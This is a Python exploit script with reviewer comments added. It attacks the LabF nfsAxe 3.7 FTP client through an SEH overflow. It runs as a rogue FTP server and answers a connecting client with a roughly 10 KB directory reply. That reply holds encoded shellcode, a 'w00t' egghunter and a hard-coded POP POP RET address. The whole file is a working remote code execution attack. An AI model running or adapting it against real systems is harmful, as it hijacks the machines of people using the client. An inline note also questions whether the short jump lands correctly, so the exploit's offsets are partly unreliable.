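#!/usr/bin/python
"""LabF nfsAxe 3.7 FTP client -- SEH buffer-overflow PoC (rogue FTP server).

The script listens as an FTP server; once the vulnerable client connects and
logs in, the server answers with an oversized quoted "current directory"
string that overwrites the client's SEH chain (see the nseh/seh values and
the egghunter further down).  Written for Python 2: the socket sends below
rely on str being a byte string.

Author: Tulpa / tulpa[at]tulpa-security[dot]com
"""

# Banner.  The copy this was taken from contained the banner twice (a
# pasted duplicate of the header), so it printed twice at start-up;
# print()-style calls work under both Python 2 and 3.
print("LabF nfsAxe 3.7 FTP Client Buffer Overflow (SEH)")
print("Author: Tulpa / tulpa[at]tulpa-security[dot]com")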

#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security

#Tested on Windows Vista x86

import socket
import sys

#badchars \x00\x10\x0a

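# --- Payload --------------------------------------------------------------
# Encoded shellcode; it must not contain the bad chars \x00 \x10 \x0a.
# The prologue (\xbb imm32, \xda\xc2 / \xd9\x74\x24\xf4) looks like an
# msf shikata_ga_nai-encoded blob, but that is not verified here.
# NOTE: in the copy this was taken from, every hex escape had lost its
# backslash ("xbb" instead of "\xbb"), which silently turned the payload
# into ASCII text and threw off the offset arithmetic below.  The escapes
# are restored here; the byte values themselves are unchanged.
buf = ""
buf += "\xbb\x7e\xbc\x7c\x19\xda\xc2\xd9\x74\x24\xf4\x58\x29"
buf += "\xc9\xb1\x59\x83\xe8\xfc\x31\x58\x0e\x03\x26\xb2\x9e"
buf += "\xec\x3e\xf2\x5e\x0f\xbe\x40\x12\x4b\xbe\xa1\xd5\x95"
buf += "\xc7\xc8\x6f\x9c\x7e\xb7\xdd\x8e\x69\x13\x07\xbf\xae"
buf += "\x85\x31\xca\x9d\xfd\xaf\xc8\xe6\x8f\x7e\x3f\xf4\xee"
buf += "\xa6\xdd\x77\xa2\x8e\x27\xb9\xce\xce\x9b\x53\x78\x7c"
buf += "\xee\x04\xb5\xb0\x20\xfe\xf5\xf8\x3c\xff\x5e\x55\xb4"
buf += "\x1a\xe9\x08\xc6\x8e\xda\xeb\xa2\xc5\x1a\x87\x6b\xd5"
buf += "\x97\xe7\x77\x48\x2c\x5f\x80\x79\x3f\xed\xc7\x51\x11"
buf += "\xbf\x18\x79\x18\xfc\xbe\x92\x0b\x69\x49\x3a\x2d\x83"
buf += "\x23\xc8\x74\xd0\xc9\xcc\x06\x1f\x37\xb8\xe2\xb1\x6b"
buf += "\xbf\xdf\xbe\x64\xb3\x20\xc1\x74\x92\xa9\xc5\xfa\xc6"
buf += "\x41\xf4\xfd\x60\x17\x1b\x91\x6d\x43\x8c\x93\x6c\x6b"
buf += "\x4c\x6b\x3b\x4b\x1b\xc4\x94\xdc\xe4\xbd\x5d\xb4\x15"
buf += "\x14\x7d\xb3\x29\xa6\x82\x94\xfa\xa1\x7e\x1b\x27\x23"
buf += "\xf7\xfd\x4d\x53\x51\x51\x6d\x06\x45\x02\xc2\x56\x20"
buf += "\xb8\xb3\xfe\x99\x3f\x6e\xef\x94\x02\xf7\x8c\x4a\xd6"
buf += "\x75\xae\xb6\xe6\x45\xa5\xa3\x51\xb5\x91\x42\xb6\xff"
buf += "\xa2\x70\x29\x44\xd5\x3c\x6d\x79\xa0\xc0\x49\xc9\x3b"
buf += "\x44\xb6\x85\xb2\xc8\x92\x45\x48\x74\xff\x75\x06\x24"
buf += "\xae\x24\xf7\x85\x01\x8e\xa6\x54\x5d\x65\x49\x07\x5e"
buf += "\xd3\x79\x2e\x41\xb6\x86\xcf\xb3\xb8\x2c\x03\xe3\xb9"
buf += "\x9a\x57\xf4\x13\x0d\x34\x5f\xca\x1a\x31\x33\xd6\xbc"
buf += "\xce\x89\x2a\x36\x84\x14\x2b\x49\xce\x9c\x81\x51\x85"
buf += "\xf9\x35\x63\x72\x1e\x07\x2a\x0f\xd5\xe3\xad\xe1\x27"
buf += "\x0b\x51\xcc\x87\x5f\x92\xce\x7c\xa7\x22\xc1\x70\xa6"
buf += "\x63\x36\x78\x93\x17\xec\x69\x91\x06\x67\xcb\x7d\xc8"
buf += "\x9c\x8a\xf6\xc6\x29\xd8\x53\xcb\xac\x35\xe8\xf7\x25"
buf += "\xc8\x07\x1c\x3b\xfa\x17\x6a\xd1\xa3\xc9\x30\x7e\x9e"
buf += "\xfe\xca"

# 32-byte egghunter using the int 0x2e syscall (push 2 / pop eax / int 2e)
# to probe pages safely; it walks memory for the tag and then jmp edi's to
# what follows it.  Bytes 18-21 (\x77\x30\x30\x74, the mov eax imm32
# operand) are the tag "w00t", compared twice via scasd.
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

# Tag placed in front of the shellcode: the hunter's tag, twice.
egg = "w00tw00t"

nseh = "\x90\x90\xEB\x05" #JMP over SEH
# NOTE(review): "\xEB\x05" sits at nseh+2, so the short jump is taken with
# EIP = nseh+4 and lands at nseh+9 -- one byte *past* the start of the
# egghunter, which begins right after the 4-byte seh at nseh+8.  The hunter's
# first instruction (66 81 ca ff 0f, or dx,0x0fff) would then be entered at
# its second byte.  The author reports this working on Vista x86; confirm the
# landing address in a debugger before relying on it on another build.
seh = "\xF8\x54\x01\x68" #POP POP RET 680154F8 in WCMDPA10.DLL
# The handler address is hard-coded from the author's install (tested on
# Windows Vista x86); re-find a POP POP RET in a non-SafeSEH module for any
# other version of the client.

# Layout of the overflowing directory name.  The 9266 term pads the
# shellcode area to a fixed size, so nseh/seh land at the same offsets
# regardless of shellcode length -- as long as buf actually fits:
#   0      "A" * 100               filler
#   100    egg (8)                 tag the egghunter scans for
#   108    "\x90" * 10             short NOP sled into the shellcode
#   118    buf                     shellcode
#   ...    "D" * (9266 - len(buf)) padding up to the SEH record
#   9384   nseh (4)                overwrites the next-SEH pointer
#   9388   seh (4)                 overwrites the handler pointer
#   9392   egghunter (32)          reached from nseh's short jump
#   9424   "C" * 576               trailing filler (10000 bytes in total)
shellcode_room = 9266
if len(buf) > shellcode_room:
    # "D" * negative is "" in Python, which would silently shift every
    # offset below; fail loudly instead.
    sys.exit("[!] shellcode is %d bytes, exceeds the %d-byte slot"
             % (len(buf), shellcode_room))

buffer = "A" * 100 + egg + "\x90" * 10 + buf + "D" * (shellcode_room - len(buf)) + nseh + seh + egghunter + "C" * 576

# The payload travels inside a quoted FTP reply line, so the whole thing
# (not just the shellcode) must be free of the bad chars.
badchars = "\x00\x10\x0a"
present = [bc for bc in badchars if bc in buffer]
if present:
    sys.exit("[!] payload contains bad chars: "
             + " ".join("\\x%02x" % ord(bc) for bc in present))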

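port = 21  # FTP control port; binding it needs root/Administrator

# --- Listener -------------------------------------------------------------
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Allow an immediate restart after a previous run left the port in
    # TIME_WAIT.
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    # 0.0.0.0: the victim connects from another host, so listen on every
    # interface.  Anything on the network can reach this listener -- run it
    # only on an isolated lab network.
    s.bind(("0.0.0.0", port))
    s.listen(5)
    print("[i] Evil FTP server started on port: "+str(port)+" ")
except socket.error as e:
    # The original caught every exception and then fell through to
    # s.accept() on a socket that was never bound (or never created);
    # report the reason and stop instead.
    print("[!] Failed to bind the server to port: "+str(port)+" ")
    print("[!] "+str(e))
    sys.exit(1)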

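# Serve clients forever; each accepted connection gets the same dialogue.
while True:
    conn, addr = s.accept()
    print("[i] Connection from "+str(addr[0])+":"+str(addr[1]))
    try:
        # Minimal FTP dialogue: greet, accept any USER / PASS, then answer
        # the client's next command with the oversized quoted directory name
        # (the reply mimics the PWD "... is current directory" format).
        # FTP reply lines are CRLF-terminated (RFC 959); the replies here
        # were being sent without a line terminator.  sendall() replaces
        # send(), which may deliver only part of the ~10 KB payload.
        conn.sendall('220 Welcome to your unfriendly FTP server\r\n')
        print(conn.recv(1024))
        conn.sendall("331 OK\r\n")
        print(conn.recv(1024))
        conn.sendall('230 OK\r\n')
        print(conn.recv(1024))
        conn.sendall('220 "'+buffer+'" is current directory\r\n')
    except socket.error as e:
        # A client that drops mid-dialogue must not take the listener down.
        print("[!] Connection error: "+str(e))
    finally:
        # The original never closed accepted connections.
        conn.close()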